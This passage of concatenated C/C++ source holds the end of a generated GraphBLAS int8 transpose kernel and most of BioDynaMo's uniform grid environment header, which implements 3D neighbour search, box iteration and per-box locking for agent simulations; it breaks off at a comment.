int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t x = (*((const int8_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
int8_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t y = (*((const int8_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
uniform_grid_environment.h | // -----------------------------------------------------------------------------
//
// Copyright (C) 2021 CERN & Newcastle University for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
#define CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
#include <assert.h>
#include <omp.h>
#include <algorithm>
#include <array>
#include <atomic>
#include <cmath>
#include <iostream>
#include <limits>
#include <memory>
#include <mutex>
#ifdef LINUX
#include <parallel/algorithm>
#endif // LINUX
#include <utility>
#include <vector>
#include <morton/morton.h> // NOLINT
#include "core/container/agent_vector.h"
#include "core/container/fixed_size_vector.h"
#include "core/container/inline_vector.h"
#include "core/container/math_array.h"
#include "core/container/parallel_resize_vector.h"
#include "core/environment/environment.h"
#include "core/environment/morton_order.h"
#include "core/functor.h"
#include "core/load_balance_info.h"
#include "core/param/param.h"
#include "core/resource_manager.h"
#include "core/util/log.h"
#include "core/util/spinlock.h"
namespace bdm {
namespace detail {
struct InitializeGPUData;
} // namespace detail
/// A class that represents a Cartesian 3D grid
class UniformGridEnvironment : public Environment {
// MechanicalForcesOpCuda needs access to some UniformGridEnvironment private
// members to reconstruct
// the grid on GPU (same for MechanicalForcesOpOpenCL)
friend struct MechanicalForcesOpCuda;
friend struct ::bdm::detail::InitializeGPUData;
friend struct MechanicalForcesOpOpenCL;
friend class SchedulerTest;
public:
/// A single unit cube of the grid
struct Box {
Spinlock lock_;
// std::atomic<bool> timestamp_;
uint32_t timestamp_;
/// start value of the linked list of agents inside this box.
/// Next element can be found at `successors_[start_]`
AgentHandle start_;
/// length of the linked list (i.e. number of agents)
/// (whether this is uint16_t or uint64_t, padding keeps sizeof(Box) at 16)
uint16_t length_;
Box() : timestamp_(0), start_(AgentHandle()), length_(0) {}
/// Copy Constructor required for boxes_.resize()
/// Since box values will be overwritten afterwards it forwards to the
/// default ctor
Box(const Box& other) : Box() {}
Box& operator=(const Box& other) {
// start_ = other.start_.load(std::memory_order_relaxed);
// length_ = other.length_.load(std::memory_order_relaxed);
start_ = other.start_;
length_ = other.length_;
return *this;
}
bool IsEmpty(uint64_t grid_timestamp) const {
return grid_timestamp != timestamp_;
}
uint16_t Size(uint64_t grid_timestamp) const {
if (IsEmpty(grid_timestamp)) {
return 0;
}
return length_;
}
/// @brief Adds an agent to this box
///
/// @param[in] ah The agent's handle
/// @param[in,out] successors The successors list
/// @param[in] grid The grid that owns this box
void AddObject(AgentHandle ah, AgentVector<AgentHandle>* successors,
UniformGridEnvironment* grid) {
std::lock_guard<Spinlock> lock_guard(lock_);
if (timestamp_ != grid->timestamp_) {
timestamp_ = grid->timestamp_;
length_ = 1;
start_ = ah;
} else {
length_++;
(*successors)[ah] = start_;
start_ = ah;
}
}
/// An iterator that iterates over the cells in this box
struct Iterator {
Iterator(UniformGridEnvironment* grid, const Box* box)
: grid_(grid), current_value_(box->start_), countdown_(box->length_) {
if (grid->timestamp_ != box->timestamp_) {
countdown_ = 0;
}
}
bool IsAtEnd() { return countdown_ <= 0; }
Iterator& operator++() {
countdown_--;
if (countdown_ > 0) {
current_value_ = grid_->successors_[current_value_];
}
return *this;
}
AgentHandle operator*() const { return current_value_; }
/// Pointer to the neighbor grid; for accessing the successor_ list
UniformGridEnvironment* grid_;
/// The current agent to be considered
AgentHandle current_value_;
/// The remaining number of agents to consider
int countdown_ = 0;
};
Iterator begin() const { // NOLINT
auto* grid = static_cast<UniformGridEnvironment*>(
Simulation::GetActive()->GetEnvironment());
return Iterator(grid, this);
}
};
/// An iterator that iterates over the boxes in this grid
struct NeighborIterator {
explicit NeighborIterator(
const FixedSizeVector<const Box*, 27>& neighbor_boxes,
uint64_t grid_timestamp)
: neighbor_boxes_(neighbor_boxes),
// start iterator from box 0
box_iterator_(neighbor_boxes_[0]->begin()),
grid_timestamp_(grid_timestamp) {
// if first box is empty
if (neighbor_boxes_[0]->IsEmpty(grid_timestamp)) {
ForwardToNonEmptyBox(grid_timestamp);
}
}
bool IsAtEnd() const { return is_end_; }
AgentHandle operator*() const { return *box_iterator_; }
/// Version where empty neighbor boxes are allowed
NeighborIterator& operator++() {
++box_iterator_;
// if iterator of current box has come to an end, continue with next box
if (box_iterator_.IsAtEnd()) {
return ForwardToNonEmptyBox(grid_timestamp_);
}
return *this;
}
private:
/// The 27 neighbor boxes that will be searched for agents
const FixedSizeVector<const Box*, 27>& neighbor_boxes_;
/// The box that is currently iterated over when searching for
/// agents
typename Box::Iterator box_iterator_;
uint64_t grid_timestamp_;
/// The id of the box to be considered (i.e. value between 0 - 26)
uint16_t box_idx_ = 0;
/// Flag to indicate that all the neighbor boxes have been searched through
bool is_end_ = false;
/// Forwards the iterator to the next non empty box and returns itself
/// If there are no non empty boxes is_end_ is set to true
NeighborIterator& ForwardToNonEmptyBox(uint64_t grid_timestamp) {
// increment box id until non empty box has been found
while (++box_idx_ < neighbor_boxes_.size()) {
// box is empty or uninitialized (padding box) -> continue
if (neighbor_boxes_[box_idx_]->IsEmpty(grid_timestamp)) {
continue;
}
// a non-empty box has been found
box_iterator_ = neighbor_boxes_[box_idx_]->begin();
return *this;
}
// all remaining boxes have been empty; reached end
is_end_ = true;
return *this;
}
};
/// Enum that determines the degree of adjacency in the neighbor box search
// todo(ahmad): currently only kHigh is supported (hardcoded 26 several
// places)
enum Adjacency {
kLow, /**< The closest 8 neighboring boxes */
kMedium, /**< The closest 18 neighboring boxes */
kHigh /**< The closest 26 neighboring boxes */
};
explicit UniformGridEnvironment(Adjacency adjacency = kHigh)
: adjacency_(adjacency), lbi_(this) {}
UniformGridEnvironment(UniformGridEnvironment const&) = delete;
void operator=(UniformGridEnvironment const&) = delete;
virtual ~UniformGridEnvironment() {}
/// Clears the grid
void Clear() override {
if (!is_custom_box_length_) {
box_length_ = 1;
}
box_length_squared_ = 1;
num_boxes_axis_ = {{0}};
num_boxes_xy_ = 0;
int32_t inf = std::numeric_limits<int32_t>::max();
grid_dimensions_ = {inf, -inf, inf, -inf, inf, -inf};
threshold_dimensions_ = {inf, -inf};
successors_.clear();
has_grown_ = false;
}
struct AssignToBoxesFunctor : public Functor<void, Agent*, AgentHandle> {
explicit AssignToBoxesFunctor(UniformGridEnvironment* grid) : grid_(grid) {}
void operator()(Agent* agent, AgentHandle ah) override {
const auto& position = agent->GetPosition();
auto idx = grid_->GetBoxIndex(position);
auto box = grid_->GetBoxPointer(idx);
box->AddObject(ah, &(grid_->successors_), grid_);
agent->SetBoxIdx(idx);
}
private:
UniformGridEnvironment* grid_ = nullptr;
};
void SetBoxLength(int32_t bl) {
box_length_ = bl;
is_custom_box_length_ = true;
}
int32_t GetBoxLength() { return box_length_; }
/// Updates the grid, as agents may have moved, added or deleted
void Update() override {
auto* rm = Simulation::GetActive()->GetResourceManager();
if (rm->GetNumAgents() != 0) {
Clear();
timestamp_++;
auto inf = Math::kInfinity;
std::array<double, 6> tmp_dim = {{inf, -inf, inf, -inf, inf, -inf}};
CalcSimDimensionsAndLargestAgent(&tmp_dim);
RoundOffGridDimensions(tmp_dim);
// If the box_length_ is not set manually, we set it to the largest agent
// size
if (!is_custom_box_length_) {
auto los = ceil(GetLargestAgentSize());
assert(
los > 0 &&
"The largest object size was found to be 0. Please check if your "
"cells are correctly initialized.");
box_length_ = los;
}
box_length_squared_ = box_length_ * box_length_;
for (int i = 0; i < 3; i++) {
int dimension_length =
grid_dimensions_[2 * i + 1] - grid_dimensions_[2 * i];
int r = dimension_length % box_length_;
// If the grid is not perfectly divisible along each dimension by the
// resolution, extend the grid so that it is
if (r != 0) {
// std::abs for the case that box_length_ > dimension_length
grid_dimensions_[2 * i + 1] += (box_length_ - r);
} else {
// Else extend the grid dimension with one row, because the outermost
// object lies exactly on the border
grid_dimensions_[2 * i + 1] += box_length_;
}
}
// Pad the grid to avoid out of bounds checks when searching neighbors
for (int i = 0; i < 3; i++) {
grid_dimensions_[2 * i] -= box_length_;
grid_dimensions_[2 * i + 1] += box_length_;
}
// Calculate how many boxes fit along each dimension
for (int i = 0; i < 3; i++) {
int dimension_length =
grid_dimensions_[2 * i + 1] - grid_dimensions_[2 * i];
assert((dimension_length % box_length_ == 0) &&
"The grid dimensions are not a multiple of its box length");
num_boxes_axis_[i] = dimension_length / box_length_;
}
num_boxes_xy_ = num_boxes_axis_[0] * num_boxes_axis_[1];
total_num_boxes_ = num_boxes_xy_ * num_boxes_axis_[2];
CheckGridGrowth();
// resize boxes_
if (boxes_.size() != total_num_boxes_) {
if (boxes_.capacity() < total_num_boxes_) {
boxes_.reserve(total_num_boxes_ * 2);
}
boxes_.resize(total_num_boxes_);
}
successors_.reserve();
// Assign agents to boxes
auto* param = Simulation::GetActive()->GetParam();
AssignToBoxesFunctor functor(this);
rm->ForEachAgentParallel(param->scheduling_batch_size, functor);
if (param->bound_space) {
int min = param->min_bound;
int max = param->max_bound;
threshold_dimensions_ = {min, max};
}
if (param->thread_safety_mechanism ==
Param::ThreadSafetyMechanism::kAutomatic) {
nb_mutex_builder_->Update();
}
} else {
// There are no agents in this simulation
auto* param = Simulation::GetActive()->GetParam();
bool uninitialized = boxes_.size() == 0;
if (uninitialized && param->bound_space) {
// Simulation has never had any agents
// Initialize grid dimensions with `Param::min_bound` and
// `Param::max_bound`
// This is required for the DiffusionGrid
int min = param->min_bound;
int max = param->max_bound;
grid_dimensions_ = {min, max, min, max, min, max};
threshold_dimensions_ = {min, max};
has_grown_ = true;
} else if (!uninitialized) {
// all agents have been removed in the last iteration
// grid state remains the same, but we have to set has_grown_ to false
// otherwise the DiffusionGrid will attempt to resize
has_grown_ = false;
} else {
Log::Fatal(
"UniformGridEnvironment",
"You tried to initialize an empty simulation without bound space. "
"Therefore we cannot determine the size of the simulation space. "
"Please add agents, or set Param::bound_space, "
"Param::min_bound, and Param::max_bound.");
}
}
}
/// @brief Calculates the squared Euclidean distance between two points
/// in 3D
///
/// @param[in] pos1 Position of the first point
/// @param[in] pos2 Position of the second point
///
/// @return The distance between the two points
///
inline double SquaredEuclideanDistance(const Double3& pos1,
const Double3& pos2) const {
const double dx = pos2[0] - pos1[0];
const double dy = pos2[1] - pos1[1];
const double dz = pos2[2] - pos1[2];
return (dx * dx + dy * dy + dz * dz);
}
inline bool WithinSquaredEuclideanDistance(double squared_radius,
const Double3& pos1,
const Double3& pos2) const {
const double dx = pos2[0] - pos1[0];
const double dx2 = dx * dx;
if (dx2 > squared_radius) {
return false;
}
const double dy = pos2[1] - pos1[1];
const double dy2_plus_dx2 = dy * dy + dx2;
if (dy2_plus_dx2 > squared_radius) {
return false;
}
const double dz = pos2[2] - pos1[2];
const double distance = dz * dz + dy2_plus_dx2;
return distance < squared_radius;
}
LoadBalanceInfo* GetLoadBalanceInfo() override {
lbi_.Update();
return &lbi_;
}
/// @brief Applies the given lambda to each neighbor
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
void ForEachNeighbor(const std::function<void(Agent*)>& lambda,
Agent& query) const {
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
while (!ni.IsAtEnd()) {
auto* agent = rm->GetAgent(*ni);
if (agent != &query) {
lambda(agent);
}
++ni;
}
}
/// @brief Applies the given lambda to each neighbor of the specified
/// agent that is within the squared radius (i.e. the criterion)
///
/// In simulation code do not use this function directly. Use the same
/// function from the execution context (e.g. `InPlaceExecutionContext`)
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
/// @param[in] squared_radius The squared search radius
///
void ForEachNeighbor(Functor<void, Agent*, double>& lambda,
const Agent& query, double squared_radius) override {
if (squared_radius > box_length_squared_) {
Log::Fatal(
"UniformGridEnvironment::ForEachNeighbor",
"The requested search radius (", std::sqrt(squared_radius), ")",
" of the neighborhood search exceeds the "
"box length (",
box_length_, "). The resulting neighborhood would be incomplete.");
}
const auto& position = query.GetPosition();
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
const unsigned batch_size = 64;
uint64_t size = 0;
Agent* agents[batch_size] __attribute__((aligned(64)));
double x[batch_size] __attribute__((aligned(64)));
double y[batch_size] __attribute__((aligned(64)));
double z[batch_size] __attribute__((aligned(64)));
double squared_distance[batch_size] __attribute__((aligned(64)));
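// Neighbor positions are staged into fixed-size, 64-byte-aligned batches so
// the distance computation below can be vectorized (see the omp simd
// pragma); the user lambda is then invoked in a separate, scalar loop.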
auto process_batch = [&]() {
#pragma omp simd
for (uint64_t i = 0; i < size; ++i) {
const double dx = x[i] - position[0];
const double dy = y[i] - position[1];
const double dz = z[i] - position[2];
squared_distance[i] = dx * dx + dy * dy + dz * dz;
}
for (uint64_t i = 0; i < size; ++i) {
lambda(agents[i], squared_distance[i]);
}
size = 0;
};
while (!ni.IsAtEnd()) {
auto ah = *ni;
// increment iterator already here to hide memory latency
++ni;
auto* agent = rm->GetAgent(ah);
if (agent != &query) {
agents[size] = agent;
const auto& pos = agent->GetPosition();
x[size] = pos[0];
y[size] = pos[1];
z[size] = pos[2];
size++;
if (size == batch_size) {
process_batch();
}
}
}
process_batch();
}
/// @brief Applies the given lambda to each neighbor of the specified
/// agent.
///
/// In simulation code do not use this function directly. Use the same
/// function from the execution context (e.g. `InPlaceExecutionContext`)
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
/// @param[in] squared_radius The search radius squared
///
void ForEachNeighbor(const std::function<void(Agent*)>& lambda,
const Agent& query, double squared_radius) {
const auto& position = query.GetPosition();
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
while (!ni.IsAtEnd()) {
// Do something with neighbor object
auto* agent = rm->GetAgent(*ni);
if (agent != &query) {
const auto& neighbor_position = agent->GetPosition();
if (this->WithinSquaredEuclideanDistance(squared_radius, position,
neighbor_position)) {
lambda(agent);
}
}
++ni;
}
}
/// @brief Return the box index in the one dimensional array of the box
/// that contains the position
///
/// @param[in] position The position of the object
///
/// @return The box index.
///
size_t GetBoxIndex(const Double3& position) const {
std::array<uint64_t, 3> box_coord;
box_coord[0] = (floor(position[0]) - grid_dimensions_[0]) / box_length_;
box_coord[1] = (floor(position[1]) - grid_dimensions_[2]) / box_length_;
box_coord[2] = (floor(position[2]) - grid_dimensions_[4]) / box_length_;
return GetBoxIndex(box_coord);
}
std::array<int32_t, 6> GetDimensions() const override {
return grid_dimensions_;
}
std::array<int32_t, 2> GetDimensionThresholds() const override {
return threshold_dimensions_;
}
void GetNumBoxesAxis(uint32_t* nba) {
nba[0] = num_boxes_axis_[0];
nba[1] = num_boxes_axis_[1];
nba[2] = num_boxes_axis_[2];
}
uint64_t GetNumBoxes() const { return boxes_.size(); }
std::array<uint64_t, 3> GetBoxCoordinates(size_t box_idx) const {
std::array<uint64_t, 3> box_coord;
box_coord[2] = box_idx / num_boxes_xy_;
auto remainder = box_idx % num_boxes_xy_;
box_coord[1] = remainder / num_boxes_axis_[0];
box_coord[0] = remainder % num_boxes_axis_[0];
return box_coord;
}
// NeighborMutex ---------------------------------------------------------
/// This class ensures thread-safety for the InPlaceExecutionContext for the
/// case
/// that an agent modifies its neighbors.
class GridNeighborMutexBuilder : public Environment::NeighborMutexBuilder {
public:
/// The NeighborMutex class is a synchronization primitive that can be
/// used to protect agents data from being simultaneously accessed by
/// multiple threads.
class GridNeighborMutex
: public Environment::NeighborMutexBuilder::NeighborMutex {
public:
GridNeighborMutex(const FixedSizeVector<uint64_t, 27>& mutex_indices,
GridNeighborMutexBuilder* mutex_builder)
: mutex_indices_(mutex_indices), mutex_builder_(mutex_builder) {
// Deadlocks occur if multiple threads try to acquire the same locks,
// but in different order.
// -> sort to avoid deadlocks - see lock ordering
std::sort(mutex_indices_.begin(), mutex_indices_.end());
}
virtual ~GridNeighborMutex() {}
void lock() override { // NOLINT
for (auto idx : mutex_indices_) {
auto& mutex = mutex_builder_->mutexes_[idx].mutex_;
// acquire lock (and spin if another thread is holding it)
while (mutex.test_and_set(std::memory_order_acquire)) {
}
}
}
void unlock() override { // NOLINT
for (auto idx : mutex_indices_) {
auto& mutex = mutex_builder_->mutexes_[idx].mutex_;
mutex.clear(std::memory_order_release);
}
}
void SetMutexIndices(const FixedSizeVector<uint64_t, 27>& indices) {
mutex_indices_ = indices;
std::sort(mutex_indices_.begin(), mutex_indices_.end());
}
private:
FixedSizeVector<uint64_t, 27> mutex_indices_;
GridNeighborMutexBuilder* mutex_builder_;
};
/// Used to store mutexes in a vector.
/// Always creates a new mutex (even for the copy constructor)
struct MutexWrapper {
MutexWrapper() {}
MutexWrapper(const MutexWrapper&) {}
std::atomic_flag mutex_ = ATOMIC_FLAG_INIT;
};
virtual ~GridNeighborMutexBuilder() {}
void Update() {
auto* grid = static_cast<UniformGridEnvironment*>(
Simulation::GetActive()->GetEnvironment());
mutexes_.resize(grid->GetNumBoxes());
}
NeighborMutex* GetMutex(uint64_t box_idx) override;
private:
/// one mutex for each box in `UniformGridEnvironment::boxes_`
std::vector<MutexWrapper> mutexes_;
};
/// Returns the `NeighborMutexBuilder`. The client uses it to create a
/// `NeighborMutex`.
NeighborMutexBuilder* GetNeighborMutexBuilder() override {
return nb_mutex_builder_.get();
}
private:
class LoadBalanceInfoUG : public LoadBalanceInfo {
public:
LoadBalanceInfoUG(UniformGridEnvironment* grid);
virtual ~LoadBalanceInfoUG();
void Update();
void CallHandleIteratorConsumer(
uint64_t start, uint64_t end,
Functor<void, Iterator<AgentHandle>*>& f) const override;
private:
UniformGridEnvironment* grid_;
MortonOrder mo_;
ParallelResizeVector<Box*> sorted_boxes_;
ParallelResizeVector<uint64_t> cummulated_agents_;
struct InitializeVectorFunctor : public Functor<void, Iterator<uint64_t>*> {
UniformGridEnvironment* grid;
uint64_t start;
ParallelResizeVector<Box*>& sorted_boxes;
ParallelResizeVector<uint64_t>& cummulated_agents;
InitializeVectorFunctor(UniformGridEnvironment* grid, uint64_t start,
decltype(sorted_boxes) sorted_boxes,
decltype(cummulated_agents) cummulated_agents);
virtual ~InitializeVectorFunctor();
void operator()(Iterator<uint64_t>* it) override;
};
void AllocateMemory();
void InitializeVectors();
};
/// The vector containing all the boxes in the grid
/// Using parallel resize vector to enable parallel initialization and thus
/// better scalability.
ParallelResizeVector<Box> boxes_;
/// is incremented at each call to Update
/// This is used to decide if boxes should be reinitialized
uint32_t timestamp_ = 0;
/// Length of a Box
int32_t box_length_ = 1;
/// Length of a Box squared
int32_t box_length_squared_ = 1;
/// True when the box length was set manually
bool is_custom_box_length_ = false;
/// Stores the number of Boxes for each axis
std::array<uint64_t, 3> num_boxes_axis_ = {{0}};
/// Number of boxes in the xy plane (=num_boxes_axis_[0] * num_boxes_axis_[1])
size_t num_boxes_xy_ = 0;
/// The total number of boxes in the uniform grid
uint64_t total_num_boxes_ = 0;
/// Implements linked list - array index = key, value: next element
///
/// // Usage
/// AgentHandle current_element = ...;
/// AgentHandle next_element = successors_[current_element];
AgentVector<AgentHandle> successors_;
/// Determines which boxes to search neighbors in (see enum Adjacency)
Adjacency adjacency_;
/// Cube which contains all agents
/// {x_min, x_max, y_min, y_max, z_min, z_max}
std::array<int32_t, 6> grid_dimensions_;
/// Stores the min / max dimension values that need to be surpassed in order
/// to trigger a diffusion grid change
std::array<int32_t, 2> threshold_dimensions_;
LoadBalanceInfoUG lbi_; //!
/// Holds instance of NeighborMutexBuilder.
/// NeighborMutexBuilder is updated if `Param::thread_safety_mechanism`
/// is set to `kAutomatic`
std::unique_ptr<GridNeighborMutexBuilder> nb_mutex_builder_ =
std::make_unique<GridNeighborMutexBuilder>();
void CheckGridGrowth() {
// Determine if the grid dimensions have changed (changed in the sense that
// the grid has grown outwards)
auto min_gd =
*std::min_element(grid_dimensions_.begin(), grid_dimensions_.end());
auto max_gd =
*std::max_element(grid_dimensions_.begin(), grid_dimensions_.end());
if (min_gd < threshold_dimensions_[0]) {
threshold_dimensions_[0] = min_gd;
has_grown_ = true;
}
if (max_gd > threshold_dimensions_[1]) {
Log::Info("UniformGridEnvironment",
"Your agents are getting near the edge of "
"the simulation space. Be aware of boundary conditions that "
"may come into play!");
threshold_dimensions_[1] = max_gd;
has_grown_ = true;
}
}
void RoundOffGridDimensions(const std::array<double, 6>& grid_dimensions) {
grid_dimensions_[0] = floor(grid_dimensions[0]);
grid_dimensions_[2] = floor(grid_dimensions[2]);
grid_dimensions_[4] = floor(grid_dimensions[4]);
grid_dimensions_[1] = ceil(grid_dimensions[1]);
grid_dimensions_[3] = ceil(grid_dimensions[3]);
grid_dimensions_[5] = ceil(grid_dimensions[5]);
}
/// @brief Gets the Moore (i.e. adjacent) boxes of the query box. Also
/// adds the query box itself.
///
/// @param[out] neighbor_boxes The neighbor boxes
/// @param[in] box_idx The query box
///
void GetMooreBoxes(FixedSizeVector<const Box*, 27>* neighbor_boxes,
size_t box_idx) const {
neighbor_boxes->push_back(GetBoxPointer(box_idx));
// Adjacent 6 (top, down, left, right, front and back)
if (adjacency_ >= kLow) {
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - 1));
neighbor_boxes->push_back(GetBoxPointer(box_idx + 1));
}
// Adjacent 12
if (adjacency_ >= kMedium) {
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_ - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_ - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_ + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_ + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_axis_[0] + 1));
}
// Adjacent 8
if (adjacency_ >= kHigh) {
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1));
}
}
/// @brief Gets the box indices of all adjacent boxes. Also adds the
/// query box index.
///
/// @param[out] box_indices Result containing all box indices
/// @param[in] box_idx The query box
///
void GetMooreBoxIndices(FixedSizeVector<uint64_t, 27>* box_indices,
size_t box_idx) const {
box_indices->push_back(box_idx);
// Adjacent 6 (top, down, left, right, front and back)
if (adjacency_ >= kLow) {
box_indices->push_back(box_idx - num_boxes_xy_);
box_indices->push_back(box_idx + num_boxes_xy_);
box_indices->push_back(box_idx - num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_axis_[0]);
box_indices->push_back(box_idx - 1);
box_indices->push_back(box_idx + 1);
}
// Adjacent 12
if (adjacency_ >= kMedium) {
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0]);
box_indices->push_back(box_idx - num_boxes_xy_ - 1);
box_indices->push_back(box_idx - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_xy_ - 1);
box_indices->push_back(box_idx + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0]);
box_indices->push_back(box_idx - num_boxes_xy_ + 1);
box_indices->push_back(box_idx - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_xy_ + 1);
box_indices->push_back(box_idx + num_boxes_axis_[0] + 1);
}
// Adjacent 8
if (adjacency_ >= kHigh) {
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1);
}
}
/// Determines the current box from the parameter box_idx and adds it,
/// together with half of the surrounding boxes, to the vector.
/// Legend: C = center, N = north, E = east, S = south, W = west, F = front,
/// B = back
/// For each box pair that is centro-symmetric, only one box is taken --
/// e.g. E-W: E, or BNW-FSE: BNW
///
/// (x-axis to the right \ y-axis up)
/// z=1
/// +-----+----+-----+
/// | BNW | BN | BNE |
/// +-----+----+-----+
/// | NW | N | NE |
/// +-----+----+-----+
/// | FNW | FN | FNE |
/// +-----+----+-----+
///
/// z = 0
/// +-----+----+-----+
/// | BW | B | BE |
/// +-----+----+-----+
/// | W | C | E |
/// +-----+----+-----+
/// | FW | F | FE |
/// +-----+----+-----+
///
/// z = -1
/// +-----+----+-----+
/// | BSW | BS | BSE |
/// +-----+----+-----+
/// | SW | S | SE |
/// +-----+----+-----+
/// | FSW | FS | FSE |
/// +-----+----+-----+
///
void GetHalfMooreBoxIndices(FixedSizeVector<size_t, 14>* neighbor_boxes,
size_t box_idx) const {
// C
neighbor_boxes->push_back(box_idx);
// BW
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0] - 1);
// FNW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1);
// NW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - 1);
// BNW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1);
// B
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0]);
// FN
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0]);
// N
neighbor_boxes->push_back(box_idx + num_boxes_xy_);
// BN
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0]);
// E
neighbor_boxes->push_back(box_idx + 1);
// BE
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0] + 1);
// FNE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1);
// NE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + 1);
// BNE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1);
}
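// Usage sketch (hypothetical caller): visiting every box once with its half
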